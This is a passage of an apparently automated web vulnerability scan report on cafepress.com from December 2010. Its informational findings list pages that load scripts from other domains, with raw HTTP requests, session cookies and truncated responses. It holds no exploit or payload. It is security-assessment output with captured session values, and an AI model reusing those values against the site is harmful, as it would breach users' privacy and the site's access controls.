s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59469
Date: Sun, 26 Dec 2010 13:48:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/
Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.41. http://www.cafepress.com/1/1/index1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/1/1/index1.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 142089
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:48:59 GMT
Connection: close
Set-Cookie: slx_session=3fd981e9a190058ee83a397fe8f24ad83ebc6679; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.o
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<body>

<script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"></script>
...[SNIP]...

5.42. http://www.cafepress.com/1/1/indexd1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/1/1/indexd1.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 149438
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:48:59 GMT
Connection: close
Set-Cookie: slx_session=4acaabeaecefdd8dff9a0090c3edc432b686b9f4; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.o
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<body>

<script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"></script>
...[SNIP]...

5.43. http://www.cafepress.com/1/3/index1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/1/3/index1.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 129977
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:49:04 GMT
Connection: close
Set-Cookie: slx_session=400f6b47f695c657eb3c14bc7e3e4a27523d7ef2; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.o
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<body>

<script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"></script>
...[SNIP]...

5.44. http://www.cafepress.com/1/3/indexb1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/1/3/indexb1.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 145045
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:49:04 GMT
Connection: close
Set-Cookie: slx_session=10526678dae4a1b5ae00b9cc20c52864241e4c1d; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.o
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<body>

<script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"></script>
...[SNIP]...

5.45. http://www.cafepress.com/1/3/indexc1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/1/3/indexc1.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 134691
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:49:07 GMT
Connection: close
Set-Cookie: slx_session=2f1df64475595c86770a06bc37800f787200ef6f; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.o
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<body>

<script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"></script>
...[SNIP]...

5.46. http://www.cafepress.com/cp/info/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/about/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/numbers.js

Request

GET /cp/info/about/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.47. http://www.cafepress.com/cp/info/help/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/help/index.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.48. http://www.cafepress.com/cp/info/sell/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/sell/index.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

Response

5.49. http://www.cafepress.com/cp/moredetails.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/moredetails.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://content1.cpcache.com/js/import.js
http://content1.cpcache.com/js/jquery/jquery-1.2.6.pack.js

Request

Response

5.50. http://www.cafepress.com/cp/sitemap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/sitemap/

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

GET /cp/sitemap/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.51. http://www.cafepress.com/cp/viewcart.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/viewcart.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/js/cartv2.js
http://content6.cpcache.com/js/jquery/thickbox/thickbox-compressed.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /cp/viewcart.aspx?s=search HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.52. http://www.cafepress.com/cp/viewcart.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/viewcart.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/js/cartv2.js
http://content4.cpcache.com/js/jquery/thickbox/thickbox-compressed.js
http://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 51119
Date: Sun, 26 Dec 2010 13:44:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:44:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://content4.cpcache.com/js/jquery/thickbox/thickbox-compressed.js"></script>
...[SNIP]...
</script>
Criteo US End-->

<script type="text/javascript" src="http://content3.cpcache.com/js/cartv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

5.53. http://www.cafepress.com/make/birth-announcements previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/birth-announcements

Issue detail

The response dynamically includes the following script from another domain:

http://content0.cpcache.com/js/hoverIntent.minified.js

Request

GET /make/birth-announcements HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.54. http://www.cafepress.com/make/custom-baby-gear previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-baby-gear

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; 